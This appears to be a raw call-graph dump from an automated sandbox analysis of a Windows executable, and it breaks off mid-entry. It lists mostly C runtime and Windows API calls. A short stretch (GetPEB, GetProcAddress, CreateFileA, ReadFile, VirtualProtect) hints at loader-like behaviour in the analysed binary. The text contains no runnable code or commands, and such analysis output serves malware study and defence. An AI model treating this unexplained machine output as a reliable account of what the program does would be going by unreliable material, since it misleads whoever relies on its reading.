17225->17175 17229 5f63b3 __Getctype 6 API calls 17226->17229 17230 5f63b3 __Getctype 6 API calls 17227->17230 17231 5f5a04 17228->17231 17232 5f59ad 17229->17232 17233 5f59bc 17230->17233 17237 5f56b7 ___free_lconv_mon 14 API calls 17232->17237 17234 5f59d7 17233->17234 17235 5f59c0 17233->17235 17238 5f5c5c __Getctype 14 API calls 17234->17238 17236 5f63b3 __Getctype 6 API calls 17235->17236 17236->17232 17237->17239 17240 5f59e2 17238->17240 17239->17224 17239->17225 17241 5f56b7 ___free_lconv_mon 14 API calls 17240->17241 17241->17239 17243 5f7c95 17242->17243 17245 5f7c5d 17242->17245 17260 5f1d28 LeaveCriticalSection 17243->17260 17245->17173 17245->17177 17245->17179 17246->17168 17248 5f1c60 _Fputc 17247->17248 17251 5f1ba8 17248->17251 17250 5f1c78 _Fputc 17250->17213 17252 5f1bb8 17251->17252 17254 5f1bbf 17251->17254 17253 5ed620 _Fputc 16 API calls 17252->17253 17253->17254 17255 5f1c25 _Fputc GetLastError SetLastError 17254->17255 17258 5f1bcd 17254->17258 17256 5f1bf4 17255->17256 17257 5f1a2c __Getctype 11 API calls 17256->17257 17256->17258 17259 5f1c24 17257->17259 17258->17250 17260->17245 17262 5e71da IsProcessorFeaturePresent 17261->17262 17263 5e71d9 17261->17263 17265 5e95cd 17262->17265 17263->17185 17268 5e96b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17265->17268 17267 5e96b0 17267->17185 17268->17267 17270 5ff6fb ___vcrt_InitializeCriticalSectionEx 5 API calls 17269->17270 17271 5ff60a 17270->17271 17272 5ff622 TlsGetValue 17271->17272 17273 5f448e 17271->17273 17272->17273 17273->17191 17273->17192 17273->17199 17275 5f56b7 ___free_lconv_mon 14 API calls 17274->17275 17276 5f2a76 17275->17276 17276->17199 17310 5ec7ea 17277->17310 17280 5f74ce GetOEMCP 17282 5f74f7 17280->17282 17281 5f74e0 17281->17282 17283 5f74e5 GetACP 17281->17283 17282->16950 17284 5f56f1 17282->17284 17283->17282 17285 5f572f 17284->17285 17289 5f56ff __Getctype 17284->17289 17287 5f1314 __Wcrtomb 14 API calls 17285->17287 17286 5f571a RtlAllocateHeap 17288 5f572d 17286->17288 17286->17289 17287->17288 17288->16946 17288->16947 17289->17285 17289->17286 17290 5ef4ab std::ios_base::_Init 2 API calls 17289->17290 17290->17289 17292 5f74ad 50 API calls 17291->17292 17293 5f72c8 17292->17293 17295 5f7305 IsValidCodePage 17293->17295 17300 5f73cd 17293->17300 17301 5f7320 std::bad_exception::bad_exception 17293->17301 17294 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17296 5f74ab 17294->17296 17297 5f7317 17295->17297 17295->17300 17296->16952 17296->16956 17298 5f7340 GetCPInfo 17297->17298 17297->17301 17298->17300 17298->17301 17300->17294 17350 5f7837 17301->17350 17303 5f79e8 ___scrt_is_nonwritable_in_current_image 17302->17303 17430 5f1d11 EnterCriticalSection 17303->17430 17305 5f79f2 17431 5f7776 17305->17431 17311 5ec808 17310->17311 17312 5ec801 17310->17312 17311->17312 17313 5f594a __Getctype 48 API calls 17311->17313 17312->17280 17312->17281 17314 5ec829 17313->17314 17318 5f5f2e 17314->17318 17319 5ec83f 17318->17319 17320 5f5f41 17318->17320 17322 5f5f5b 17319->17322 17320->17319 17326 5fa055 17320->17326 17323 5f5f6e 17322->17323 17324 5f5f83 17322->17324 17323->17324 17347 5f7242 17323->17347 17324->17312 17327 5fa061 ___scrt_is_nonwritable_in_current_image 17326->17327 17328 5f594a __Getctype 48 API calls 17327->17328 17329 5fa06a 17328->17329 17330 5fa0b0 17329->17330 17339 5f1d11 EnterCriticalSection 17329->17339 17330->17319 17332 5fa088 17340 5fa0d6 17332->17340 17337 5f1f83 CallUnexpected 48 API calls 17338 5fa0d5 17337->17338 17339->17332 17341 5fa0e4 __Getctype 17340->17341 17343 5fa099 17340->17343 17342 5f9e8a __Getctype 14 API calls 17341->17342 17341->17343 17342->17343 17344 5fa0b5 17343->17344 17345 5f1d28 std::_Lockit::~_Lockit LeaveCriticalSection 17344->17345 17346 5fa0ac 17345->17346 17346->17330 17346->17337 17348 5f594a __Getctype 48 API calls 17347->17348 17349 5f7247 17348->17349 17349->17324 17351 5f785f GetCPInfo 17350->17351 17360 5f7928 17350->17360 17357 5f7877 17351->17357 17351->17360 17353 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17355 5f79da 17353->17355 17355->17300 17361 5f6ce0 17357->17361 17359 5f6de1 53 API calls 17359->17360 17360->17353 17362 5ec7ea __strnicoll 48 API calls 17361->17362 17363 5f6d00 17362->17363 17381 5f573f 17363->17381 17365 5f6dbc 17368 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17365->17368 17366 5f6db4 17384 5e9f07 17366->17384 17367 5f6d2d 17367->17365 17367->17366 17370 5f56f1 __strnicoll 15 API calls 17367->17370 17372 5f6d52 __alloca_probe_16 std::bad_exception::bad_exception 17367->17372 17371 5f6ddf 17368->17371 17370->17372 17376 5f6de1 17371->17376 17372->17366 17373 5f573f __strnicoll MultiByteToWideChar 17372->17373 17374 5f6d9b 17373->17374 17374->17366 17375 5f6da2 GetStringTypeW 17374->17375 17375->17366 17377 5ec7ea __strnicoll 48 API calls 17376->17377 17378 5f6df4 17377->17378 17390 5f6e2a 17378->17390 17388 5f5769 17381->17388 17385 5e9f11 17384->17385 17387 5e9f22 17384->17387 17386 5f2a5e ___std_exception_copy 14 API calls 17385->17386 17385->17387 17386->17387 17387->17365 17389 5f575b MultiByteToWideChar 17388->17389 17389->17367 17391 5f6e45 __strnicoll 17390->17391 17392 5f573f __strnicoll MultiByteToWideChar 17391->17392 17396 5f6e89 17392->17396 17393 5f7004 17395 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17393->17395 17394 5f6f57 17399 5e9f07 __freea 14 API calls 17394->17399 17397 5f6e15 17395->17397 17396->17393 17396->17394 17398 5f56f1 __strnicoll 15 API calls 17396->17398 17400 5f6eaf __alloca_probe_16 17396->17400 17397->17359 17398->17400 17399->17393 17400->17394 17401 5f573f __strnicoll MultiByteToWideChar 17400->17401 17402 5f6ef8 17401->17402 17402->17394 17418 5f64f3 17402->17418 17430->17305 17441 5f33bb 17431->17441 17433 5f7798 17434 5f33bb 29 API calls 17433->17434 17435 5f77b7 17434->17435 17436 5f77de 17435->17436 17437 5f56b7 ___free_lconv_mon 14 API calls 17435->17437 17438 5f7a1d 17436->17438 17437->17436 17455 5f1d28 LeaveCriticalSection 17438->17455 17440 5f7a0b 17440->16957 17442 5f33cc 17441->17442 17450 5f33c8 codecvt 17441->17450 17443 5f33d3 17442->17443 17447 5f33e6 std::bad_exception::bad_exception 17442->17447 17444 5f1314 __Wcrtomb 14 API calls 17443->17444 17445 5f33d8 17444->17445 17446 5f19ff __strnicoll 29 API calls 17445->17446 17446->17450 17448 5f341d 17447->17448 17449 5f3414 17447->17449 17447->17450 17448->17450 17452 5f1314 __Wcrtomb 14 API calls 17448->17452 17451 5f1314 __Wcrtomb 14 API calls 17449->17451 17450->17433 17453 5f3419 17451->17453 17452->17453 17454 5f19ff __strnicoll 29 API calls 17453->17454 17454->17450 17455->17440 17457 5f5348 17456->17457 17458 5f533a 17456->17458 17459 5f1314 __Wcrtomb 14 API calls 17457->17459 17458->17457 17463 5f5360 17458->17463 17460 5f5350 17459->17460 17462 5f19ff __strnicoll 29 API calls 17460->17462 17461 5f535a 17461->16894 17462->17461 17463->17461 17464 5f1314 __Wcrtomb 14 API calls 17463->17464 17464->17460 17466 5f17f3 17465->17466 17467 5f1810 17465->17467 17468 5f180a 17466->17468 17469 5f56b7 ___free_lconv_mon 14 API calls 17466->17469 17467->16905 17470 5f56b7 ___free_lconv_mon 14 API calls 17468->17470 17469->17466 17470->17467 17472 5f1a38 17471->17472 17473 5f1a60 __CreateFrameInfo 8 API calls 17472->17473 17474 5f1a4d GetCurrentProcess TerminateProcess 17473->17474 17474->16911 17476 5fca50 17475->17476 17477 5fca61 17476->17477 17479 5fca74 ___from_strstr_to_strchr 17476->17479 17478 5f1314 __Wcrtomb 14 API calls 17477->17478 17487 5fca66 17478->17487 17480 5fcc8b 17479->17480 17482 5fca94 17479->17482 17481 5f1314 __Wcrtomb 14 API calls 17480->17481 17483 5fcc90 17481->17483 17538 5fccb0 17482->17538 17485 5f56b7 ___free_lconv_mon 14 API calls 17483->17485 17485->17487 17487->16850 17488 5fcad8 17524 5fcac4 17488->17524 17542 5fccca 17488->17542 17489 5fcada 17493 5f69f4 __Getctype 14 API calls 17489->17493 17489->17524 17490 5fcab6 17497 5fcabf 17490->17497 17498 5fcad3 17490->17498 17495 5fcae8 17493->17495 17494 5f56b7 ___free_lconv_mon 14 API calls 17494->17487 17496 5f56b7 ___free_lconv_mon 14 API calls 17495->17496 17500 5fcaf3 17496->17500 17501 5f1314 __Wcrtomb 14 API calls 17497->17501 17502 5fccb0 48 API calls 17498->17502 17499 5fcb4d 17503 5f56b7 ___free_lconv_mon 14 API calls 17499->17503 17500->17488 17506 5f69f4 __Getctype 14 API calls 17500->17506 17500->17524 17501->17524 17502->17488 17509 5fcb55 17503->17509 17504 5fcb98 17505 5fc065 std::ios_base::_Init 32 API calls 17504->17505 17504->17524 17507 5fcbc6 17505->17507 17510 5fcb0f 17506->17510 17508 5f56b7 ___free_lconv_mon 14 API calls 17507->17508 17515 5fcb82 17508->17515 17509->17515 17546 5fc065 17509->17546 17514 5f56b7 ___free_lconv_mon 14 API calls 17510->17514 17511 5fcc80 17512 5f56b7 ___free_lconv_mon 14 API calls 17511->17512 17512->17487 17514->17488 17515->17511 17515->17515 17518 5f69f4 __Getctype 14 API calls 17515->17518 17515->17524 17516 5fcb79 17517 5f56b7 ___free_lconv_mon 14 API calls 17516->17517 17517->17515 17519 5fcc11 17518->17519 17520 5fcc19 17519->17520 17521 5fcc21 17519->17521 17522 5f56b7 ___free_lconv_mon 14 API calls 17520->17522 17523 5f532c ___std_exception_copy 29 API calls 17521->17523 17522->17524 17525 5fcc2d 17523->17525 17524->17494 17526 5fcca5 17525->17526 17527 5fcc34 17525->17527 17529 5f1a2c __Getctype 11 API calls 17526->17529 17555 60392c 17527->17555 17531 5fccaf 17529->17531 17532 5fcc5b 17534 5f1314 __Wcrtomb 14 API calls 17532->17534 17533 5fcc7a 17535 5f56b7 ___free_lconv_mon 14 API calls 17533->17535 17536 5fcc60 17534->17536 17535->17511 17537 5f56b7 ___free_lconv_mon 14 API calls 17536->17537 17537->17524 17539 5fccbd 17538->17539 17540 5fca9f 17538->17540 17570 5fcd1f 17539->17570 17540->17488 17540->17489 17540->17490 17543 5fcb3d 17542->17543 17545 5fcce0 17542->17545 17543->17499 17543->17504 17545->17543 17585 60383b 17545->17585 17547 5fc08d 17546->17547 17548 5fc072 17546->17548 17550 5fc09c 17547->17550 17685 6027c4 17547->17685 17548->17547 17549 5fc07e 17548->17549 17551 5f1314 __Wcrtomb 14 API calls 17549->17551 17692 5ff005 17550->17692 17554 5fc083 std::bad_exception::bad_exception 17551->17554 17554->17516 17704 5f69b5 17555->17704 17560 60399f 17562 6039ab 17560->17562 17564 5f56b7 ___free_lconv_mon 14 API calls 17560->17564 17561 5f69b5 48 API calls 17563 60397c 17561->17563 17565 5fcc55 17562->17565 17567 5f56b7 ___free_lconv_mon 14 API calls 17562->17567 17566 5ec8e4 17 API calls 17563->17566 17564->17562 17565->17532 17565->17533 17568 603989 17566->17568 17567->17565 17568->17560 17569 603993 SetEnvironmentVariableW 17568->17569 17569->17560 17571 5fcd2d 17570->17571 17572 5fcd32 17570->17572 17571->17540 17573 5f69f4 __Getctype 14 API calls 17572->17573 17575 5fcd4f 17573->17575 17574 5fcdbd 17576 5f1f83 CallUnexpected 48 API calls 17574->17576 17575->17574 17578 5fcdc2 17575->17578 17581 5f69f4 __Getctype 14 API calls 17575->17581 17582 5f56b7 ___free_lconv_mon 14 API calls 17575->17582 17583 5f532c ___std_exception_copy 29 API calls 17575->17583 17584 5fcdac 17575->17584 17576->17578 17577 5f56b7 ___free_lconv_mon 14 API calls 17577->17571 17579 5f1a2c __Getctype 11 API calls 17578->17579 17580 5fcdce 17579->17580 17581->17575 17582->17575 17583->17575 17584->17577 17586 603849 17585->17586 17587 60384f 17585->17587 17590 604063 17586->17590 17591 6040ab 17586->17591 17603 603864 17587->17603 17593 604069 17590->17593 17596 604086 17590->17596 17623 6040c1 17591->17623 17595 5f1314 __Wcrtomb 14 API calls 17593->17595 17594 604079 17594->17545 17597 60406e 17595->17597 17599 5f1314 __Wcrtomb 14 API calls 17596->17599 17602 6040a4 17596->17602 17598 5f19ff __strnicoll 29 API calls 17597->17598 17598->17594 17600 604095 17599->17600 17601 5f19ff __strnicoll 29 API calls 17600->17601 17601->17594 17602->17545 17604 5ec7ea __strnicoll 48 API calls 17603->17604 17605 60387a 17604->17605 17606 60385f 17605->17606 17607 603896 17605->17607 17608 6038ad 17605->17608 17606->17545 17609 5f1314 __Wcrtomb 14 API calls 17607->17609 17611 6038b6 17608->17611 17612 6038c8 17608->17612 17610 60389b 17609->17610 17615 5f19ff __strnicoll 29 API calls 17610->17615 17616 5f1314 __Wcrtomb 14 API calls 17611->17616 17613 6038d5 17612->17613 17614 6038e8 17612->17614 17617 6040c1 __strnicoll 48 API calls 17613->17617 17641 60418c 17614->17641 17615->17606 17619 6038bb 17616->17619 17617->17606 17621 5f19ff __strnicoll 29 API calls 17619->17621 17621->17606 17622 5f1314 __Wcrtomb 14 API calls 17622->17606 17624 6040d1 17623->17624 17625 6040eb 17623->17625 17628 5f1314 __Wcrtomb 14 API calls 17624->17628 17626 6040f3 17625->17626 17627 60410a 17625->17627 17629 5f1314 __Wcrtomb 14 API calls 17626->17629 17630 604116 17627->17630 17631 60412d 17627->17631 17632 6040d6 17628->17632 17633 6040f8 17629->17633 17634 5f1314 __Wcrtomb 14 API calls 17630->17634 17638 5ec7ea __strnicoll 48 API calls 17631->17638 17639 6040e1 17631->17639 17635 5f19ff __strnicoll 29 API calls 17632->17635 17636 5f19ff __strnicoll 29 API calls 17633->17636 17637 60411b 17634->17637 17635->17639 17636->17639 17640 5f19ff __strnicoll 29 API calls 17637->17640 17638->17639 17639->17594 17640->17639 17642 5ec7ea __strnicoll 48 API calls 17641->17642 17643 60419f 17642->17643 17646 6041d2 17643->17646 17651 604206 __strnicoll 17646->17651 17647 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17648 6038fe 17647->17648 17648->17606 17648->17622 17649 604286 17652 5f573f __strnicoll MultiByteToWideChar 17649->17652 17658 60428a 17649->17658 17650 60446a 17651->17649 17651->17650 17653 604273 GetCPInfo 17651->17653 17651->17658 17655 60430c 17652->17655 17653->17649 17653->17658 17654 60445e 17656 5e9f07 __freea 14 API calls 17654->17656 17655->17654 17657 5f56f1 __strnicoll 15 API calls 17655->17657 17655->17658 17659 604333 __alloca_probe_16 17655->17659 17656->17658 17657->17659 17658->17647 17658->17650 17659->17654 17660 5f573f __strnicoll MultiByteToWideChar 17659->17660 17661 60437f 17660->17661 17661->17654 17662 5f573f __strnicoll MultiByteToWideChar 17661->17662 17663 60439b 17662->17663 17663->17654 17664 6043a9 17663->17664 17665 60440c 17664->17665 17667 5f56f1 __strnicoll 15 API calls 17664->17667 17670 6043c2 __alloca_probe_16 17664->17670 17666 5e9f07 __freea 14 API calls 17665->17666 17668 604412 17666->17668 17667->17670 17669 5e9f07 __freea 14 API calls 17668->17669 17669->17658 17670->17665 17671 5f573f __strnicoll MultiByteToWideChar 17670->17671 17672 604405 17671->17672 17672->17665 17673 60442e 17672->17673 17679 5f6245 17673->17679 17676 5e9f07 __freea 14 API calls 17677 60444e 17676->17677 17678 5e9f07 __freea 14 API calls 17677->17678 17678->17658 17680 5f67ac std::_Lockit::_Lockit 5 API calls 17679->17680 17681 5f6250 17680->17681 17682 5f658f __strnicoll 5 API calls 17681->17682 17684 5f6256 17681->17684 17683 5f6296 CompareStringW 17682->17683 17683->17684 17684->17676 17686 6027e4 HeapSize 17685->17686 17687 6027cf 17685->17687 17686->17550 17688 5f1314 __Wcrtomb 14 API calls 17687->17688 17689 6027d4 17688->17689 17690 5f19ff __strnicoll 29 API calls 17689->17690 17691 6027df 17690->17691 17691->17550 17693 5ff01d 17692->17693 17694 5ff012 17692->17694 17696 5ff025 17693->17696 17702 5ff02e __Getctype 17693->17702 17695 5f56f1 __strnicoll 15 API calls 17694->17695 17701 5ff01a 17695->17701 17699 5f56b7 ___free_lconv_mon 14 API calls 17696->17699 17697 5ff058 HeapReAlloc 17697->17701 17697->17702 17698 5ff033 17700 5f1314 __Wcrtomb 14 API calls 17698->17700 17699->17701 17700->17701 17701->17554 17702->17697 17702->17698 17703 5ef4ab std::ios_base::_Init 2 API calls 17702->17703 17703->17702 17705 5ec7ea __strnicoll 48 API calls 17704->17705 17706 5f69c7 17705->17706 17707 5f69d9 17706->17707 17712 5f6226 17706->17712 17709 5ec8e4 17707->17709 17718 5ec93c 17709->17718 17715 5f6792 17712->17715 17716 5f670d std::_Lockit::_Lockit 5 API calls 17715->17716 17717 5f622e 17716->17717 17717->17707 17719 5ec94a 17718->17719 17720 5ec964 17718->17720 17736 5ec8ca 17719->17736 17722 5ec98a 17720->17722 17723 5ec96b 17720->17723 17724 5f573f __strnicoll MultiByteToWideChar 17722->17724 17727 5ec8fc 17723->17727 17740 5ec88b 17723->17740 17726 5ec999 17724->17726 17728 5ec9a0 GetLastError 17726->17728 17730 5ec9c6 17726->17730 17733 5ec88b 15 API calls 17726->17733 17727->17560 17727->17561 17745 5f133a 17728->17745 17730->17727 17731 5f573f __strnicoll MultiByteToWideChar 17730->17731 17734 5ec9dd 17731->17734 17733->17730 17734->17727 17734->17728 17735 5f1314 __Wcrtomb 14 API calls 17735->17727 17737 5ec8d5 17736->17737 17738 5ec8dd 17736->17738 17739 5f56b7 ___free_lconv_mon 14 API calls 17737->17739 17738->17727 17739->17738 17741 5ec8ca 14 API calls 17740->17741 17742 5ec899 17741->17742 17750 5ec86c 17742->17750 17753 5f1327 17745->17753 17747 5f1345 __dosmaperr 17748 5f1314 __Wcrtomb 14 API calls 17747->17748 17749 5ec9ac 17748->17749 17749->17735 17751 5f56f1 __strnicoll 15 API calls 17750->17751 17752 5ec879 17751->17752 17752->17727 17754 5f5a9b __dosmaperr 14 API calls 17753->17754 17755 5f132c 17754->17755 17755->17747 17759 5e2010 GetModuleHandleA GetModuleFileNameW 17756->17759 17766 5f401a 17759->17766 17761 5e2081 17770 5e1f00 17761->17770 17764 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17765 5e2099 17764->17765 17765->16714 17767 5f402d _Fputc 17766->17767 17779 5f408f 17767->17779 17769 5f403f _Fputc 17769->17761 17821 5e1ba0 GetPEB 17770->17821 17772 5e1f1f 17822 5e1c10 GetProcAddress 17772->17822 17774 5e1f39 17775 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17774->17775 17777 5e1ffb 17775->17777 17777->17764 17778 5e1f31 17778->17774 17835 5e1db0 17778->17835 17780 5f40bf 17779->17780 17781 5f40ce 17780->17781 17782 5f40ec 17780->17782 17793 5f40c3 17780->17793 17783 5f1ba8 _Fputc 29 API calls 17781->17783 17784 5f40f9 17782->17784 17803 5ed5c0 17782->17803 17783->17793 17787 5f4113 17784->17787 17788 5f4131 17784->17788 17785 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17791 5f4334 17785->17791 17809 5ff46b 17787->17809 17789 5f4145 17788->17789 17790 5f42c1 17788->17790 17789->17793 17795 5f41df 17789->17795 17799 5f4189 17789->17799 17790->17793 17794 5f5801 _Fputc WideCharToMultiByte 17790->17794 17791->17769 17793->17785 17794->17793 17796 5f5801 _Fputc WideCharToMultiByte 17795->17796 17798 5f41f2 17796->17798 17797 5f5801 _Fputc WideCharToMultiByte 17797->17793 17798->17793 17800 5f420b GetLastError 17798->17800 17799->17797 17800->17793 17801 5f421a 17800->17801 17801->17793 17802 5f5801 _Fputc WideCharToMultiByte 17801->17802 17802->17801 17804 5ed5d0 17803->17804 17813 5f5f88 17804->17813 17810 5ff4a2 std::_Locinfo::_Locinfo_dtor codecvt 17809->17810 17811 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17810->17811 17812 5ff578 17811->17812 17812->17793 17814 5f5f9f 17813->17814 17815 5ed5ed 17813->17815 17814->17815 17816 5fa055 __Getctype 48 API calls 17814->17816 17817 5f5fb9 17815->17817 17816->17815 17818 5ed5fa 17817->17818 17819 5f5fd0 17817->17819 17818->17784 17819->17818 17820 5f7242 __strnicoll 48 API calls 17819->17820 17820->17818 17821->17772 17823 5e1c59 CreateFileA 17822->17823 17824 5e1cb3 GetFileSize 17823->17824 17825 5e1caa 17823->17825 17826 5e1cd9 CloseHandle 17824->17826 17827 5e1cf1 17824->17827 17828 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17825->17828 17826->17825 17829 5e1cfc ReadFile 17827->17829 17830 5e1d98 17828->17830 17831 5e1d3c 17829->17831 17832 5e1d70 CloseHandle 17829->17832 17830->17778 17833 5e1d4d 17831->17833 17834 5e1d58 CloseHandle 17831->17834 17832->17825 17833->17834 17834->17825 17847 5e1000 17835->17847 17838 5e1000 115 API calls 17839 5e1e5b GetProcAddress 17838->17839 17840 5e1e84 VirtualProtect 17839->17840 17842 5e1edc 17840->17842 17843 5e1ed1 17840->17843 17845 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17842->17845 17858 5e1bd0 17843->17858 17846 5e1eeb 17845->17846 17846->17774 17848 5e1056 17847->17848 17862 5e1440 17848->17862 17850 5e13c7 17891 5e1b80 17850->17891 17855 5e1167 ___std_exception_copy 17855->17850 17857 5f2a5e ___std_exception_copy 14 API calls 17855->17857 17866 5e1490 17855->17866 17869 5e14c0 17855->17869 17885 5e1af0 17855->17885 17857->17855 17859 5e1bfa 17858->17859 17860 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17859->17860 17861 5e1c04 17860->17861 17861->17842 17863 5e1466 std::ios_base::_Init 17862->17863 17864 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17863->17864 17865 5e1487 17864->17865 17865->17855 17894 5e2410 17866->17894 17868 5e14aa 17868->17855 17871 5e1510 _strlen 17869->17871 17941 5e3090 17871->17941 17872 5e15b1 17878 5e15c4 17872->17878 17945 5e31c0 17872->17945 17877 5e18ef 17877->17855 17967 5e35f0 17878->17967 17880 5e1601 std::ios_base::_Ios_base_dtor 17886 5e1b20 _Fputc 17885->17886 18137 5e2130 17886->18137 17889 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17890 5e1b4e 17889->17890 17890->17855 18156 5e2230 17891->18156 17895 5e2458 17894->17895 17897 5e243f 17894->17897 17898 5e24f0 17895->17898 17897->17868 17899 5e2533 std::ios_base::_Init 17898->17899 17917 5e27a0 17899->17917 17902 5e258a 17921 5e2820 17902->17921 17907 5e25b9 std::ios_base::_Init 17908 5e2653 17907->17908 17909 5e2620 17907->17909 17911 5e28f0 5 API calls 17908->17911 17935 5e28f0 17909->17935 17918 5e27bb std::ios_base::_Init 17917->17918 17919 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17918->17919 17920 5e2578 17919->17920 17920->17902 17932 5e2800 17920->17932 17922 5e2837 17921->17922 17923 5e27a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17922->17923 17924 5e25a1 17923->17924 17925 5e28a0 17924->17925 17926 5e2af0 30 API calls 17925->17926 17927 5e28ba 17926->17927 17927->17907 17933 5e7974 std::ios_base::_Init 30 API calls 17932->17933 17934 5e2812 17933->17934 17942 5e30d9 17941->17942 17943 5e30f1 17942->17943 17975 5e3720 17942->17975 17943->17872 17983 5e74e4 17945->17983 17949 5e3217 17950 5e3255 17949->17950 18004 5e3ac0 17949->18004 17997 5e7515 17950->17997 17952 5e331a 17952->17880 17955 5e328b 18018 5e3c20 17955->18018 17968 5e3615 17967->17968 18118 5e4de0 17968->18118 17971 5e3640 17972 5e3654 17971->17972 17973 5e366f 17972->17973 18133 5e6940 17972->18133 17973->17877 17976 5e3762 17975->17976 17977 5e3090 39 API calls 17976->17977 17980 5e3815 17976->17980 17979 5e377d 17977->17979 17978 5e3640 39 API calls 17978->17980 17981 5e35f0 39 API calls 17979->17981 17982 5e3790 17979->17982 17980->17943 17981->17982 17982->17978 17984 5e74fa 17983->17984 17985 5e74f3 17983->17985 17987 5e3202 17984->17987 18036 5e9c58 EnterCriticalSection 17984->18036 18031 5f1d3f 17985->18031 17989 5e3990 17987->17989 17990 5e39ee 17989->17990 17991 5e39b2 17989->17991 17993 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17990->17993 17992 5e74e4 std::_Lockit::_Lockit 7 API calls 17991->17992 17995 5e39c3 17992->17995 17994 5e3a00 17993->17994 17994->17949 17996 5e7515 std::_Lockit::~_Lockit 2 API calls 17995->17996 17996->17990 17998 5e751f 17997->17998 17999 5f1d4d 17997->17999 18000 5e7532 17998->18000 18037 5e9c66 LeaveCriticalSection 17998->18037 18038 5f1d28 LeaveCriticalSection 17999->18038 18000->17952 18003 5f1d54 18003->17952 18005 5e3aff 18004->18005 18006 5e3272 18004->18006 18005->18006 18039 5e7153 18005->18039 18006->17955 18014 5e3bf0 18006->18014 18015 5e3c08 18014->18015 18082 5ea45c 18015->18082 18019 5e3c50 18018->18019 18032 5f660b std::_Lockit::_Lockit 5 API calls 18031->18032 18033 5f1d44 18032->18033 18034 5f1d11 std::_Lockit::_Lockit EnterCriticalSection 18033->18034 18035 5f1d4b 18034->18035 18035->17987 18036->17987 18037->18000 18038->18003 18040 5e7158 ___std_exception_copy 18039->18040 18041 5e7172 18040->18041 18042 5ef4ab std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 18040->18042 18043 5e7174 18040->18043 18042->18040 18083 5ea476 18082->18083 18121 5e4e30 18118->18121 18122 5e4f1c 18121->18122 18123 5e4e74 18121->18123 18124 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18122->18124 18126 5ea45c Concurrency::cancel_current_task RaiseException 18123->18126 18127 5e4e94 18123->18127 18125 5e18d9 18124->18125 18125->17971 18126->18127 18128 5e4f30 std::ios_base::_Init 38 API calls 18127->18128 18129 5e4eef 18128->18129 18130 5e4f70 std::ios_base::_Init 30 API calls 18129->18130 18131 5e4f04 18130->18131 18132 5ea45c Concurrency::cancel_current_task RaiseException 18131->18132 18132->18122 18134 5e6982 18133->18134 18135 5e698a 18134->18135 18136 5e35f0 39 API calls 18134->18136 18135->17973 18136->18135 18138 5e2159 18137->18138 18141 5ed388 18138->18141 18140 5e1b3b 18140->17889 18142 5ed39c _Fputc 18141->18142 18143 5ed3be 18142->18143 18144 5ed3e5 18142->18144 18145 5f1ba8 _Fputc 29 API calls 18143->18145 18148 5eeb3d 18144->18148 18147 5ed3d9 _Fputc 18145->18147 18147->18140 18149 5eeb49 ___scrt_is_nonwritable_in_current_image 18148->18149 18150 5ed13f _Ungetc EnterCriticalSection 18149->18150 18151 5eeb57 18150->18151 18152 5ee512 79 API calls 18151->18152 18153 5eeb64 18152->18153 18154 5eeb8c LeaveCriticalSection 18153->18154 18155 5eeb75 18154->18155 18155->18147 18158 5e2244 std::ios_base::_Init 18156->18158 18157 5e13d2 18157->17838 18158->18157 18160 5e2320 18158->18160 18163 5e2350 18160->18163 18162 5e2344 18162->18157 18164 5e237b error_info_injector 18163->18164 18165 5e2369 18163->18165 18164->18162 18166 5e23a0 std::ios_base::_Init 29 API calls 18165->18166 18166->18164 18168 5ef303 18167->18168 18169 5ef2f1 18167->18169 18179 5ef45e 18168->18179 18171 5e9a20 __CreateFrameInfo GetModuleHandleW 18169->18171 18174 5ef2f6 18171->18174 18173 5ea2cb 18173->16740 18174->18168 18194 5ef1f8 GetModuleHandleExW 18174->18194 18180 5ef46a ___scrt_is_nonwritable_in_current_image 18179->18180 18200 5f1d11 EnterCriticalSection 18180->18200 18182 5ef474 18201 5ef35b 18182->18201 18184 5ef481 18205 5ef49f 18184->18205 18187 5ef293 18230 5ef27a 18187->18230 18189 5ef29d 18190 5ef2b1 18189->18190 18191 5ef2a1 GetCurrentProcess TerminateProcess 18189->18191 18192 5ef1f8 __CreateFrameInfo 3 API calls 18190->18192 18191->18190 18193 5ef2b9 ExitProcess 18192->18193 18195 5ef258 18194->18195 18196 5ef237 GetProcAddress 18194->18196 18198 5ef25e FreeLibrary 18195->18198 18199 5ef267 18195->18199 18196->18195 18197 5ef24b 18196->18197 18197->18195 18198->18199 18199->18168 18200->18182 18202 5ef367 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 18201->18202 18204 5ef3cb __CreateFrameInfo 18202->18204 18208 5f102e 18202->18208 18204->18184 18229 5f1d28 LeaveCriticalSection 18205->18229 18207 5ef33a 18207->18173 18207->18187 18209 5f103a __EH_prolog3 18208->18209 18212 5f12b9 18209->18212 18211 5f1061 std::ios_base::_Init 18211->18204 18213 5f12c5 ___scrt_is_nonwritable_in_current_image 18212->18213 18220 5f1d11 EnterCriticalSection 18213->18220 18215 5f12d3 18221 5f1184 18215->18221 18220->18215 18222 5f11a3 18221->18222 18223 